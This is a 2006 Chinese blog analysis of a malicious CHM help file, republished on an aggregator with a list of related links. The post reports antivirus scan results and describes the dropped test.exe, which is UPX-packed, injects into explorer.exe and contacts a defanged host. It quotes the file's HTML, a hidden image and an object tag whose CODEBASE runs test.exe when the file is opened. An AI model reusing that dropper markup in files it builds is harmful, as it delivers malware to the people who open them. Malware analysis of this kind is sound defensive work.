[06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)
来源:互联网 发布:linux系统优化脚本 编辑:程序博客网 时间:2024/04/30 08:24
endurer 原创
2006-06-20 第3版 补充:瑞星18.32.10将test.exe报为Trojan.DL.Inject.fg
2006-06-19 第2版 补充:江民KV将test.exe报为TrojanDownloader.Small.mp
2006-06-18 第1版
一位网发来的cHM文件中有代码:
<body onselectstart="return false"; onpaste="return false";>
<img src="test.exe" width=0 height=0>
<img src="001.jpg">
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe">
</object>
因此打开此CHM文件会释放/运行一个名为test.exe的文件。
test.exe用Microsoft Visual C++ 编写,经UPX压缩,会用线程插入explorer.exe,试图访问:hxxp://gd.vnet.cn
File: test.exe
Status: POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database)
MD5 1d0b29b416ebe8e942173a326eb6e1ed
Packers detected: UPX
Scanner results
AntiVir Found Heuristic/Hijacker (probable variant)
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VirusBuster Found nothing
VBA32 Found nothing
- [06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)
- [06-26] 关于病毒Trojan.DL.Agent.alb的一点分析(第3版)
- delphi制作资源文件(二)一个A.exe释放出B.exe 并且修改b.exe变量的值
- delphi制作资源文件(一)一个A.exe释放出B.exe
- 如何将自己的文件作为资源文件放入VC工程中?如何在运行时,从EXE文件中提取(释放)出这个文件?
- 一个exe文件怎么运行起来的
- 如何把一个现成的exe文件合并到合并到我的程序里?运行时再释放出来?
- VC读取文件(exe、.doc、.chm等)
- 某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
- 释放资源文件中的exe文件并运行
- 从VB资源文件中释放出的EXE文件为何运行不了?
- HH.EXE反编译CHM文件
- CHM文件不能运行的解决方法
- 遭遇Trojan.DL.Win32.Autorun.yuz,Trojan.Win32.Inject.gh,Trojan.Win32.Agent.zsq等
- VC释放EXE自身的资源文件
- 解决病毒Trojan.DL.Small.azt、Trojan.DL.QQHelper.dsb、Dropper.Agent.bba等
- 一个会下载 Trojan.DL.Agent.wzr 的政府网站
- 某驱动开发网被挂马Trojan.DL.Win32.Small.gkm
- 实用javascrip
- 项目管理中的“三个代表”(下)(新补)
- 好笑的那几个小时
- 用vfloppy安装CDLinux到硬盘,并修改缺省extra路径参数
- 做自己的系统分析师
- [06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)
- Web setup project 相关
- 理想
- Stringizing Operator (#)
- Rootkits 和 Windows Vista
- 在Win9x/NT下获取硬盘物理序列号
- 人生需要规划
- 过犹不及
- IT 非人生活